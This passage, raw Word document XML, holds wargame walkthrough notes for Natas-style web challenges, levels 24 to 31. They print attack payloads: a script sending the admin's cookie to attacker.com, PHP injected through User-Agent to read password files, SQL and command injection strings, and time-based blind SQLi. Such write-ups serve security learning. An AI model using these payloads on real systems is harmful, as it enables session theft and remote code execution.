        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00D02C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>, it runs the command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F075F6E" w14:textId="3AD44DDD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 xml:space="preserve">Level 24 </w:t>
      </w:r>
      <w:r w:rsidR="00880EFE" w:rsidRPr="0024263C">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">--&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00880EFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Level 25 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E4F439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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627A12E2" w14:textId="77777777" w:rsidR="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004548A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Use Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">suite </w:t>
      </w:r>
      <w:r w:rsidRPr="004548A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>to modify User-Agent to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003362B0" w14:textId="77777777" w:rsidR="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004548A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5DB3B5" w14:textId="77777777" w:rsidR="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004548A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>document.location='http://attacker.com/steal?cookie='+document.cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC40250" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="004548A2" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004548A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2999C44E" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00A54B3D" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004548A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>The admin’s cookie is leaked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0CA6F3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Tools Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6D7E1B" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="004548A2" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004548A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>and script tag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268BDD1A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Logic:.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EADFBB2" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="004548A2" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004548A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>If we set User-Agent to &lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004548A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>alert(1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004548A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;/script&gt;, it executes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539DBFEB" w14:textId="2AABB200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 xml:space="preserve">Level 25 </w:t>
      </w:r>
      <w:r w:rsidR="00880EFE" w:rsidRPr="0024263C">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">--&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00880EFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Level 26 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D8758F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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C22CAF6" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="004548A2" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004548A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Inject PHP code via User-Agent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD11B4E" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="004548A2" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004548A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Access the log file → RCE achieved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A11544D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Tools Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DC0D6E" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="004548A2" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004548A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Inject PHP code into logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FBE763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Logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE8A42C" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="004548A2" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004548A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>If we set User-Agent to &lt;?php system('cat /etc/natas...'); ?&gt;, it executes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EEF257" w14:textId="6818A2D8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 xml:space="preserve">Level 26 </w:t>
      </w:r>
      <w:r w:rsidR="00880EFE" w:rsidRPr="0024263C">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">--&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00880EFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Level 27 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D3E2F3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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B65B1F" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="004548A2" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004548A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Intercept the request with Burp Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD27BBE" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="004548A2" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004548A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Change User-Agent to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E20CCD" w14:textId="1B0C3A68" w:rsidR="0024263C" w:rsidRPr="004548A2" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004548A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;?php system("cat /etc/natas_webpass/natas2</w:t>
      </w:r>
      <w:r w:rsidR="007E62F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="004548A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>"); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0811FA14" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="004548A2" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004548A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Visit the log file (often /logs/natas26.log).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B3906E" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="004548A2" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004548A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>The PHP executes, revealing the password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B8AA85" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="004548A2" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs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lastRenderedPageBreak/>
        <w:t>Tools Used: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4548A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Burp Suite ,Basic PHP Knowledge </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32729300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Logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707E22F1" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="004548A2" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004548A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>If we inject PHP code into the log, we can execute commands when the log is viewed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320F5D61" w14:textId="7DD7C38D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Level 27</w:t>
      </w:r>
      <w:r w:rsidR="00880EFE" w:rsidRPr="0024263C">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">--&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00880EFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Level 28 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127E2663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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9356C5" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00AC7BC5" w:rsidRDefault="0024263C" w:rsidP="0024263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Set </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7BC5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Username: natas28"#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B747CE4" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00AC7BC5" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:p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Password: Anything, ignored due to #comment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE7E895" w14:textId="77777777" w:rsidR="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263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Then </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7BC5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Login </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D266FB" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00AC7BC5" w:rsidRDefault="0024263C" w:rsidP="0024263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permission</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7BC5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7BC5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC596A2" w14:textId="77777777" w:rsidR="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A308A9C" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00AC7BC5" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs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Tools Used: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AC7BC5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Browser DevTools </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7BC5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>SQLMap </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434260A2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Logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6481F826" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00AC7BC5" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:p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 xml:space="preserve">A classic ' OR 1=1 -- trick won’t work </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6919A6B7" w14:textId="1E5DB89F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Level 28</w:t>
      </w:r>
      <w:r w:rsidR="00880EFE" w:rsidRPr="0024263C">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">--&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00880EFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Level 29 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181D9D50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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4328CFF1" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00AC7BC5" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:p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Write a script to test each character with SLEEP(3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBE2E24" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00AC7BC5" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:p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If delay occurs, the character is correct.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFCC989" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00BF7EEB" w:rsidRDefault="0024263C" w:rsidP="0024263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Execution will be done </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7BC5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>until full password is leaked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CC57EC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Tools Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B55D9B0" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00AC7BC5" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:p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Python Script </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278D36CA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Logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7BB4FA" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00AC7BC5" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:p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The app doesn’t show errors, but responds slower if a query is true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DAD39A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 xml:space="preserve">Level 29 - Level 30 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F4B3A8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lastRenderedPageBreak/>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669CFF7B" w14:textId="081A3C3A" w:rsidR="0024263C" w:rsidRPr="00AC7BC5" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:p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Submit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> this </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7BC5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> ; cat /etc/natas_webpass/natas3</w:t>
      </w:r>
      <w:r w:rsidR="007E62F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F3A8F5" w14:textId="160585B6" w:rsidR="0024263C" w:rsidRPr="007E62F1" w:rsidRDefault="0024263C" w:rsidP="0024263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It </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7BC5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>shows password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A59206" w14:textId="77777777" w:rsidR="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs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Tools Used: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common injection bypasss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DFD3E9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 xml:space="preserve"> Logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D1627D" w14:textId="01AF492D" w:rsidR="0024263C" w:rsidRPr="00AC7BC5" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:p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If we inject ; cat /etc/natas_webpass/natas3</w:t>
      </w:r>
      <w:r w:rsidR="007E62F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7BC5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>, it executes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BC553C" w14:textId="372DF22A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 xml:space="preserve">Level 30 </w:t>
      </w:r>
      <w:r w:rsidR="00880EFE" w:rsidRPr="0024263C">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">--&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00880EFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Level 31 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051EDA82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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB15C6F" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00AC7BC5" w:rsidRDefault="0024263C" w:rsidP="0024263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Instead of SQLi Enter </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7BC5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> username=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
